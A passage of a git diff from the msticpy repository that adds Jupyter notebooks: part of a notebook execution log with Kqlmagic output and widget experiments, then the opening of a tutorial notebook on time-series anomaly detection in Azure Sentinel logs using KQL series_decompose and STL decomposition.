document.getElementById('jupyter-config-data');\n                        if (configDataScipt != null) {\n                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n                                var basePath = 'E:/src/notebooks/tests' + '/';\n                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n                                }\n                            } \n                        }\n                    }\n\n                    // assume local jupyter notebook\n                    if (base_url.length == 0) {\n\n                        var parts = loc.split('/');\n                        parts.pop();\n                        base_url = parts.join('/') + '/';\n                    }\n                    url = base_url + file_path;\n                }\n\n                window.focus();\n                var w = screen.width / 2;\n                var h = screen.height / 2;\n                params = 'width='+w+',height='+h;\n                kql_Magic__a927809c_8142_43e1_96b3_4ad87cfe95a3_at_loganalytics_schema = window.open(url, window_name, window_params + params);\n            }\n            </script>\n\n            </body></html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "9026887c-7e4b-4bea-9dbb-28b7445cdd2e",
+     "text": "# Authentication\nfrom msticpy.common.wsconfig import WorkspaceConfig\nws_config = WorkspaceConfig('config.json')\nWORKSPACE_ID = \"a927809c-8142-43e1-96b3-4ad87cfe95a3\"\nTENANT_ID = \"69d28fd7-42a5-48bc-a619-af56397b9f28\"\n\nqry_prov = QueryProvider(data_environment='LogAnalytics')\nla_connection_string = f'loganalytics://code().tenant(\"{TENANT_ID}\").workspace(\"{WORKSPACE_ID}\")'\nqry_prov.connect(connection_str=la_connection_string)"
+    },
+    "executionTime": "2019-08-15T21:37:36.751Z"
+   },
+   {
+    "cell": {
+     "executionCount": 3,
+     "executionEventId": "79650457-b14a-469c-8896-832eb9e97315",
+     "hasError": false,
+     "id": "2ff20a29-8db3-42f9-bb33-745f305dbd87",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "['FoliumMap',\n 'GeoLiteLookup',\n 'HTML',\n 'IPStackLookup',\n 'In',\n 'IoCExtract',\n 'MIN_REQ_PYTHON',\n 'Markdown',\n 'MatplotlibDeprecationWarning',\n 'Observations',\n 'Out',\n 'QueryProvider',\n 'SecurityAlert',\n 'SecurityEvent',\n 'TENANT_ID',\n 'TILookup',\n 'VERSION',\n 'VTLookup',\n 'WIDGET_DEFAULTS',\n 'WORKSPACE_ID',\n 'WorkspaceConfig',\n '_',\n '__',\n '___',\n '__builtin__',\n '__builtins__',\n '__doc__',\n '__loader__',\n '__name__',\n '__package__',\n '__spec__',\n '_dh',\n '_i',\n '_i1',\n '_i2',\n '_i3',\n '_ih',\n '_ii',\n '_iii',\n '_oh',\n 'add_related_alerts',\n 'base64',\n 'base64unpack',\n 'check_py_version',\n 'create_alert_graph',\n 'display',\n 'entities',\n 'entityschema',\n 'exit',\n 'geo_distance',\n 'geoip',\n 'get_ipython',\n 'iocextract',\n 'kql',\n 'la_connection_string',\n 'nbdisplay',\n 'nbwidgets',\n 'nx',\n 'observationlist',\n 'pd',\n 'pkg_config',\n 'plt',\n 'qry_prov',\n 'query_builtin_queries',\n 'query_defns',\n 'query_mgr',\n 'query_schema',\n 'quit',\n 'security_alert',\n 'security_alert_graph',\n 'security_base',\n 'security_event',\n 'sns',\n 'sys',\n 'tilookup',\n 'tiproviders',\n 'utility',\n 'utils',\n 'vtlookup',\n 'warnings',\n 'widgets',\n 'ws_config']"
+       },
+       "execution_count": 3,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "26b9e886-3fc7-4985-9873-7fa7c3a00cef",
+     "text": "dir()"
+    },
+    "executionTime": "2019-08-15T21:37:51.162Z"
+   },
+   {
+    "cell": {
+     "executionCount": 4,
+     "executionEventId": "7fda6933-b7f6-492c-b0bf-c982a2b5c7b4",
+     "hasError": false,
+     "id": "2ff20a29-8db3-42f9-bb33-745f305dbd87",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "['AlertSelector',\n 'Callable',\n 'Enum',\n 'GetEnvironmentKey',\n 'GetSingleAlert',\n 'JSONDecodeError',\n 'Layout',\n 'List',\n 'Lookback',\n 'Mapping',\n 'QueryParamProvider',\n 'QueryTime',\n 'SelectString',\n 'TimeUnit',\n 'VERSION',\n '__all__',\n '__author__',\n '__builtins__',\n '__cached__',\n '__doc__',\n '__file__',\n '__loader__',\n '__name__',\n '__package__',\n '__spec__',\n '__version__',\n '_parse_time_unit',\n 'datetime',\n 'display',\n 'export',\n 'json',\n 'os',\n 'pd',\n 'qry',\n 're',\n 'timedelta',\n 'widgets']"
+       },
+       "execution_count": 4,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "26b9e886-3fc7-4985-9873-7fa7c3a00cef",
+     "text": "dir(nbwidgets)"
+    },
+    "executionTime": "2019-08-15T21:38:06.750Z"
+   },
+   {
+    "cell": {
+     "executionCount": 5,
+     "executionEventId": "16cd90e7-100a-41bb-9479-14454e477093",
+     "hasError": false,
+     "id": "2ff20a29-8db3-42f9-bb33-745f305dbd87",
+     "outputs": [],
+     "persistentId": "26b9e886-3fc7-4985-9873-7fa7c3a00cef",
+     "text": "q_times = nbwidgets.QueryTime()"
+    },
+    "executionTime": "2019-08-15T21:38:36.419Z"
+   },
+   {
+    "cell": {
+     "executionCount": 6,
+     "executionEventId": "1dfd861f-3f7e-42aa-ad74-c7f12c162a91",
+     "hasError": true,
+     "id": "2ff20a29-8db3-42f9-bb33-745f305dbd87",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "__init__() got an unexpected keyword argument 'autodisplay'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-6-b77ab23b4d34>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mq_times\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mnbwidgets\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mQueryTime\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mautodisplay\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m: __init__() got an unexpected keyword argument 'autodisplay'"
+       ]
+      }
+     ],
+     "persistentId": "26b9e886-3fc7-4985-9873-7fa7c3a00cef",
+     "text": "q_times = nbwidgets.QueryTime(autodisplay=True)"
+    },
+    "executionTime": "2019-08-15T21:39:01.195Z"
+   },
+   {
+    "cell": {
+     "executionCount": 7,
+     "executionEventId": "da819559-25b5-451f-8edc-54fa1761284e",
+     "hasError": false,
+     "id": "2ff20a29-8db3-42f9-bb33-745f305dbd87",
+     "outputs": [
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "b21d5a9747a64fb0b8a4c866219edebf",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HTML(value='<h4>Set query time boundaries</h4>')"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "9b770b01e4d049a091997afa4b9fd6b5",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HBox(children=(DatePicker(value=datetime.date(2019, 8, 15), description='Origin Date'), Text(value='21:39:12.3…"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "74146108f4b04c6c993408d2108bfabb",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "VBox(children=(IntRangeSlider(value=(-60, 10), description='Time Range (min):', layout=Layout(width='80%'), mi…"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "26b9e886-3fc7-4985-9873-7fa7c3a00cef",
+     "text": "q_times = nbwidgets.QueryTime(auto_display=True)"
+    },
+    "executionTime": "2019-08-15T21:39:12.712Z"
+   },
+   {
+    "cell": {
+     "executionCount": 8,
+     "executionEventId": "dd3239aa-89dc-46de-9ce2-75a23e53f5bd",
+     "hasError": false,
+     "id": "2ff20a29-8db3-42f9-bb33-745f305dbd87",
+     "outputs": [
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "216098facd7e42db99bbfee5d78c4f79",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HTML(value='<h4>Set query time boundaries</h4>')"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "fe0f85d832ab46adaefd7505d2b5161e",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HBox(children=(DatePicker(value=datetime.date(2019, 8, 15), description='Origin Date'), Text(value='21:39:34.2…"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "26b4f1c36b494bcf8985d9bde8521a13",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "VBox(children=(IntRangeSlider(value=(-60, 10), description='Time Range (day):', layout=Layout(width='80%'), mi…"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "26b9e886-3fc7-4985-9873-7fa7c3a00cef",
+     "text": "q_times = nbwidgets.QueryTime(units=\"day\", auto_display=True)"
+    },
+    "executionTime": "2019-08-15T21:39:34.401Z"
+   }
+  ],
+  "kernelspec": {
+   "display_name": "Python 3.8 - AzureML",
+   "language": "python",
+   "name": "python38-azureml"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.8.8"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "uuid": "46ae5bc2-7293-4189-867f-4d9d055cd37e",
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/TimeSeriesAnomaliesVisualization.ipynb b/docs/notebooks/TimeSeriesAnomaliesVisualization.ipynb
new file mode 100644
index 000000000..f457f3c6e
--- /dev/null
+++ b/docs/notebooks/TimeSeriesAnomaliesVisualization.ipynb
@@ -0,0 +1,1621 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#msticpy---Time-Series-Analysis-and-anomalies-Visualization\" data-toc-modified-id=\"msticpy---Time-Series-Analysis-and-anomalies-Visualization-1\">msticpy - Time Series Analysis and anomalies Visualization</a></span></li><li><span><a href=\"#Generating-Time-Series-Data\" data-toc-modified-id=\"Generating-Time-Series-Data-2\">Generating Time Series Data</a></span><ul class=\"toc-item\"><li><span><a href=\"#Using-LogAnalytics-Query-Provider\" data-toc-modified-id=\"Using-LogAnalytics-Query-Provider-2.1\">Using LogAnalytics Query Provider</a></span><ul class=\"toc-item\"><li><span><a href=\"#Displaying-available-timeseries-queries\" data-toc-modified-id=\"Displaying-available-timeseries-queries-2.1.1\">Displaying available timeseries queries</a></span></li><li><span><a href=\"#Get-TimeSeries-Data-from-LogAnalytics-Table\" data-toc-modified-id=\"Get-TimeSeries-Data-from-LogAnalytics-Table-2.1.2\">Get TimeSeries Data from LogAnalytics Table</a></span></li></ul></li></ul></li><li><span><a href=\"#Time-Series-Analysis-and-discovering-Anomalies\" data-toc-modified-id=\"Time-Series-Analysis-and-discovering-Anomalies-3\">Time Series Analysis and discovering Anomalies</a></span><ul class=\"toc-item\"><li><span><a href=\"#Using-Built-in-KQL-to-generate-TimeSeries-decomposition\" data-toc-modified-id=\"Using-Built-in-KQL-to-generate-TimeSeries-decomposition-3.1\">Using Built-in KQL to generate TimeSeries decomposition</a></span></li><li><span><a href=\"#Using-MSTICPY---Seasonal-Trend-decomposition-using-LOESS-(STL)\" data-toc-modified-id=\"Using-MSTICPY---Seasonal-Trend-decomposition-using-LOESS-(STL)-3.2\">Using MSTICPY - Seasonal-Trend decomposition using LOESS (STL)</a></span><ul class=\"toc-item\"><li><span><a href=\"#Documentation-of-timeseries_anomalies_stl-function\" data-toc-modified-id=\"Documentation-of-timeseries_anomalies_stl-function-3.2.1\">Documentation of timeseries_anomalies_stl function</a></span></li><li><span><a href=\"#Discover-anomalies-using-timeseries_anomalies_stl-function\" data-toc-modified-id=\"Discover-anomalies-using-timeseries_anomalies_stl-function-3.2.2\">Discover anomalies using timeseries_anomalies_stl function</a></span></li><li><span><a href=\"#Displaying-Anomalies-using-STL\" data-toc-modified-id=\"Displaying-Anomalies-using-STL-3.2.3\">Displaying Anomalies using STL</a></span></li></ul></li><li><span><a href=\"#Read-From-External-Sources\" data-toc-modified-id=\"Read-From-External-Sources-3.3\">Read From External Sources</a></span><ul class=\"toc-item\"><li><span><a href=\"#Displaying-Anomalies-Separately\" data-toc-modified-id=\"Displaying-Anomalies-Separately-3.3.1\">Displaying Anomalies Separately</a></span></li></ul></li><li><span><a href=\"#Displaying-Time-Series-anomaly-alerts\" data-toc-modified-id=\"Displaying-Time-Series-anomaly-alerts-3.4\">Displaying Time Series anomaly alerts</a></span></li></ul></li><li><span><a href=\"#Time-Series-Anomalies-Visualization\" data-toc-modified-id=\"Time-Series-Anomalies-Visualization-4\">Time Series Anomalies Visualization</a></span><ul class=\"toc-item\"><li><span><a href=\"#Using-Bokeh-Visualization-Library\" data-toc-modified-id=\"Using-Bokeh-Visualization-Library-4.1\">Using Bokeh Visualization Library</a></span></li><li><span><a href=\"#Documentation-for-display_timeseries_anomalies\" data-toc-modified-id=\"Documentation-for-display_timeseries_anomalies-4.2\">Documentation for display_timeseries_anomalies</a></span></li><li><span><a href=\"#Exporting-Plots-as-PNGs\" data-toc-modified-id=\"Exporting-Plots-as-PNGs-4.3\">Exporting Plots as PNGs</a></span></li><li><span><a href=\"#Using-Built-in-KQL-render-operator\" data-toc-modified-id=\"Using-Built-in-KQL-render-operator-4.4\">Using Built-in KQL render operator</a></span></li></ul></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# msticpy - Time Series Analysis and anomalies Visualization\n",
+    "\n",
+    "This notebook demonstrates the time series analysis and anomalies visualization built using the [Bokeh library](https://bokeh.pydata.org) as well as using built-in native KQL operators.\n",
+    "\n",
+    "You must have msticpy installed along with the timeseries dependencies to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[timeseries]\n",
+    "```\n",
+    "To run the Azure Sentinel timeseries queries you will also need the \"azsentinel\" dependencies\n",
+    "```\n",
+    "%pip install --upgrade msticpy[timeseries, azsentinel]\n",
+    "```\n",
+    "\n",
+    "Time Series analysis generally involves below steps\n",
+    "- Generating TimeSeries Data\n",
+    "- Use Time Series Analysis functions to discover anomalies\n",
+    "- Visualize Time Series anomalies\n",
+    "\n",
+    "Read more about time series analysis in detail from reference microsoft TechCommunity blog posts\n",
+    "\n",
+    "<br>***Reference Blog Posts:***\n",
+    "- [Looking for unknown anomalies - what is normal? Time Series analysis & its applications in Security](https://techcommunity.microsoft.com/t5/azure-sentinel/looking-for-unknown-anomalies-what-is-normal-time-series/ba-p/555052)\n",
+    "- [Time Series visualization of Palo Alto logs to detect data exfiltration](https://techcommunity.microsoft.com/t5/azure-sentinel/time-series-visualization-of-palo-alto-logs-to-detect-data/ba-p/666344)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:19.012701Z",
+     "start_time": "2020-06-09T16:46:18.975317Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<style>.container { width:90% !important; }</style>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "import warnings\n",
+    "\n",
+    "from msticpy.nbtools.utility import check_py_version\n",
+    "\n",
+    "MIN_REQ_PYTHON = (3, 6)\n",
+    "check_py_version(MIN_REQ_PYTHON)\n",
+    "\n",
+    "from IPython import get_ipython\n",
+    "from IPython.display import display, HTML, Markdown\n",
+    "import ipywidgets as widgets\n",
+    "\n",
+    "import pandas as pd\n",
+    "\n",
+    "# setting pandas display options for dataframe\n",
+    "pd.set_option(\"display.max_rows\", 100)\n",
+    "pd.set_option(\"display.max_columns\", 50)\n",
+    "pd.set_option(\"display.max_colwidth\", 100)\n",
+    "\n",
+    "# msticpy imports\n",
+    "from msticpy.data import QueryProvider\n",
+    "from msticpy.nbtools import *\n",
+    "from msticpy.sectools import *\n",
+    "from msticpy.nbtools.wsconfig import WorkspaceConfig\n",
+    "from msticpy.nbtools.timeseries import display_timeseries_anomolies \n",
+    "from msticpy.analysis.timeseries import timeseries_anomalies_stl\n",
+    "\n",
+    "WIDGET_DEFAULTS = {\n",
+    "    \"layout\": widgets.Layout(width=\"95%\"),\n",
+    "    \"style\": {\"description_width\": \"initial\"},\n",
+    "}\n",
+    "\n",
+    "# Adjusting width of the screen\n",
+    "display(HTML(\"<style>.container { width:90% !important; }</style>\"))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Generating Time Series Data\n",
+    "Time Series is a series of data points indexed (or listed or graphed) in time order. \n",
+    "<br>The data points are often discrete numeric points such as frequency of counts or occurrences against a timestamp column of the dataset"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using LogAnalytics Query Provider\n",
+    "msticpy has QueryProvider through which you can connect to LogAnalytics Data environment. via `QueryProvider(data_environment=\"LogAnalytics\")`\n",
+    "<br>Once you connect to data environment (`qry_prov.connect()`), you can list the available queries (`qry_prov.list_queries()`) for the data environment which in this case is LogAnalytics.\n",
+    "\n",
+    "```python\n",
+    "# Read workspace configuration from msticpyconfig.yaml\n",
+    "ws_config = WorkspaceConfig()\n",
+    "# Authentication\n",
+    "qry_prov = QueryProvider(data_environment=\"LogAnalytics\")\n",
+    "qry_prov.connect(connection_str=ws_config.code_connect_str)\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Displaying available timeseries queries\n",
+    "For this notebook, we are interested in time series queries only, so we will filter and display only those.\n",
+    "\n",
+    "```python\n",
+    "queries = qry_prov.list_queries()\n",
+    "for query in queries:\n",
+    "    if \"timeseries\" in query:\n",
+    "        print(query)\n",
+    "```\n",
+    "\n",
+    "```\n",
+    "MultiDataSource.get_timeseries_anomalies\n",
+    "MultiDataSource.get_timeseries_data\n",
+    "MultiDataSource.get_timeseries_decompose\n",
+    "MultiDataSource.plot_timeseries_datawithbaseline\n",
+    "MultiDataSource.plot_timeseries_scoreanomolies\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Get TimeSeries Data from LogAnalytics Table\n",
+    "\n",
+    "You can get more details about the individual query by executing  `qry_prov.MultiDataSource.get_timeseries_data('?')` which will display Query, data source, parameters and parameterized raw KQL query \n",
+    "```\n",
+    "Query:  get_timeseries_data\n",
+    "Data source:  LogAnalytics\n",
+    "Retrieves TimeSeriesData prepared to use with built-in KQL time series functions\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "add_query_items: str (optional)\n",
+    "    Additional query clauses\n",
+    "aggregatecolumn: str (optional)\n",
+    "    field to agregate from source dataset\n",
+    "    (default value is: Total)\n",
+    "aggregatefunction: str (optional)\n",
+    "    Aggregation functions to use - count(), sum(), avg() etc\n",
+    "    (default value is: count())\n",
+    "end: datetime\n",
+    "    Query end time\n",
+    "groupbycolumn: str (optional)\n",
+    "    Group by field to aggregate results\n",
+    "    (default value is: Type)\n",
+    "scorethreshold: str (optional)\n",
+    "    Score threshold for alerting\n",
+    "    (default value is: 3)\n",
+    "start: datetime\n",
+    "    Query start time\n",
+    "table: str\n",
+    "    Table name\n",
+    "timeframe: str (optional)\n",
+    "    Aggregation TimeFrame\n",
+    "    (default value is: 1h)\n",
+    "timestampcolumn: str (optional)\n",
+    "    Timestamp field to use from source dataset\n",
+    "    (default value is: TimeGenerated)\n",
+    "where_clause: str (optional)\n",
+    "    Optional additional filter clauses\n",
+    "Query:\n",
+    " {table} {where_clause} | project {timestampcolumn},{aggregatecolumn},{groupbycolumn} | where {timestampcolumn} >= datetime({start}) | where {timestampcolumn} <= datetime({end}) | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn} {add_query_items}\n",
+    "```\n",
+    "\n",
+    "***Sample python code leveraging KQL query will look like this***\n",
+    "\n",
+    "```python\n",
+    "\n",
+    "# Specify start and end timestamps\n",
+    "start = \"2020-02-09 00:00:00.000000\"\n",
+    "end = \"2020-03-10 00:00:00.000000\"\n",
+    "\n",
+    "# Execute the query by passing required and optional parameters\n",
+    "time_series_data = qry_prov.MultiDataSource.get_timeseries_data(\n",
+    "    start=start,\n",
+    "    end=end,\n",
+    "    table=\"CommonSecurityLog\",\n",
+    "    timestampcolumn=\"TimeGenerated\",\n",
+    "    aggregatecolumn=\"SentBytes\",\n",
+    "    groupbycolumn=\"DeviceVendor\",\n",
+    "    aggregatefunction=\"sum(SentBytes)\",\n",
+    "    where_clause='|where DeviceVendor==\"Palo Alto Networks\"',\n",
+    "    add_query_items='|mv-expand TimeGenerated to typeof(datetime), SentBytes to typeof(long)',\n",
+    "    )\n",
+    "\n",
+    " #display output\n",
+    "time_series_data\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-03-09T19:16:11.192789Z",
+     "start_time": "2020-03-09T19:16:11.190086Z"
+    }
+   },
+   "source": [
+    "# Time Series Analysis and discovering Anomalies\n",
+    "By analyzing time series data over an extended period, we can identify time-based patterns (e.g. seasonality, trend etc.) in the data and extract meaningful statistics which can help in flagging outliers.  A particular example in a security context is user logon patterns over a period of time exhibiting different behavior after hours and on weekends: computing deviations from these changing patterns is rather difficult in traditional atomic detections with static thresholds. KQL built-in functions can automatically identify such seasonality and trend from the input data and take it into consideration when flagging anomalies."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using Built-in KQL to generate TimeSeries decomposition\n",
+    "In this case, we will use built-in KQL function `series_decompose()` to decompose time series to generate additional data points such as baseline, seasonal , trend etc.\n",
+    "\n",
+    "***KQL Reference Documentation:***\n",
+    "- [series_decompose](https://docs.microsoft.com/azure/kusto/query/series-decomposefunction)\n",
+    "\n",
+    "You can use available query `qry_prov.MultiDataSource.get_timeseries_decompose()` to get the similar details\n",
+    "```\n",
+    "Query:  get_timeseries_decompose\n",
+    "Data source:  LogAnalytics\n",
+    "Time Series decomposition and anomalies generated using built-in KQL time series function- series_decompose\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "add_query_items: str (optional)\n",
+    "    Additional query clauses\n",
+    "aggregatecolumn: str (optional)\n",
+    "    field to agregate from source dataset\n",
+    "    (default value is: Total)\n",
+    "aggregatefunction: str (optional)\n",
+    "    Aggregation functions to use - count(), sum(), avg() etc\n",
+    "    (default value is: count())\n",
+    "end: datetime\n",
+    "    Query end time\n",
+    "groupbycolumn: str (optional)\n",
+    "    Group by field to aggregate results\n",
+    "    (default value is: Type)\n",
+    "scorethreshold: str (optional)\n",
+    "    Score threshold for alerting\n",
+    "    (default value is: 3)\n",
+    "start: datetime\n",
+    "    Query start time\n",
+    "table: str\n",
+    "    Table name\n",
+    "timeframe: str (optional)\n",
+    "    Aggregation TimeFrame\n",
+    "    (default value is: 1h)\n",
+    "timestampcolumn: str (optional)\n",
+    "    Timestamp field to use from source dataset\n",
+    "    (default value is: TimeGenerated)\n",
+    "where_clause: str (optional)\n",
+    "    Optional additional filter clauses\n",
+    "Query:\n",
+    " {table} {where_clause} | project {timestampcolumn},{aggregatecolumn},{groupbycolumn} | where {timestampcolumn} >= datetime({start}) | where {timestampcolumn} <= datetime({end}) | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn} | extend (baseline,seasonal,trend,residual) = series_decompose({aggregatecolumn}) | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime), baseline to typeof(double), seasonal to typeof(double), trend to typeof(long), residual to typeof(long) {add_query_items}\n",
+    "```\n",
+    "\n",
+    "***Sample python code leveraging KQL query will look like this***\n",
+    "\n",
+    "```python\n",
+    "time_series_baseline = qry_prov.MultiDataSource.get_timeseries_decompose(\n",
+    "    start=start,\n",
+    "    end=end,\n",
+    "    table=\"CommonSecurityLog\",\n",
+    "    timestampcolumn=\"TimeGenerated\",\n",
+    "    aggregatecolumn=\"SentBytes\",\n",
+    "    groupbycolumn=\"DeviceVendor\",\n",
+    "    aggregatefunction=\"sum(SentBytes)\",\n",
+    "    where_clause='|where DeviceVendor==\"Palo Alto Networks\"',\n",
+    ")\n",
+    "\n",
+    "#Show sample records\n",
+    "time_series_baseline.head()\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using MSTICPY - Seasonal-Trend decomposition using LOESS (STL)\n",
+    "\n",
+    "In this case, we will use function msticpy function `timeseries_anomalies_stl` which leverages `STL` method from `statsmodels` API to decompose a time series into three components: trend, seasonal and residual. STL uses LOESS (locally estimated scatterplot smoothing) to extract smooths estimates of the three components. The key inputs into STL are:\n",
+    "\n",
+    "- season - The length of the seasonal smoother. Must be odd.\n",
+    "- trend - The length of the trend smoother, usually around 150% of season. Must be odd and larger than season.\n",
+    "- low_pass - The length of the low-pass estimation window, usually the smallest odd number larger than the periodicity of the data.\n",
+    "\n",
+    "More info : https://www.statsmodels.org/dev/generated/statsmodels.tsa.seasonal.STL.html#statsmodels.tsa.seasonal.STL\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Documentation of timeseries_anomalies_stl function\n",
+    "\n",
+    "timeseries_anomalies_stl(data: pandas.core.frame.DataFrame, **kwargs) -> pandas.core.frame.DataFrame\n",
+    "    Discover anomalies in Timeseries data using\n",
+    "    STL (Seasonal-Trend Decomposition using LOESS) method using statsmodels package.\n",
+    "    \n",
+    "    Parameters\n",
+    "    ----------\n",
+    "    data : pd.DataFrame\n",
+    "        DataFrame as a time series data set retrived from data connector or external data source.\n",
+    "        Dataframe must have 2 columns with time column set as index and other numeric value.\n",
+    "    \n",
+    "    Other Parameters\n",
+    "    ----------------\n",
+    "    seasonal : int, optional\n",
+    "        Seasonality period of the input data required for STL. \n",
+    "        Must be an odd integer, and should normally be >= 7 (default).\n",
+    "    period: int, optional\n",
+    "        Periodicity of the the input data. by default 24 (Hourly).\n",
+    "    score_threshold : float, optional\n",
+    "        standard deviation threshold value calculated using Z-score used to flag anomalies,\n",
+    "        by default 3\n",
+    "    \n",
+    "    Returns\n",
+    "    -------\n",
+    "    pd.DataFrame\n",
+    "        Returns a dataframe with additional columns by decomposing time series data\n",
+    "        into residual, trend, seasonal, weights, baseline, score and anomalies.\n",
+    "        The anomalies column will have 0, 1,-1 values based on score_threshold set.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-06-09T16:46:27.330996Z",
+     "start_time": "2020-06-09T16:46:27.293648Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
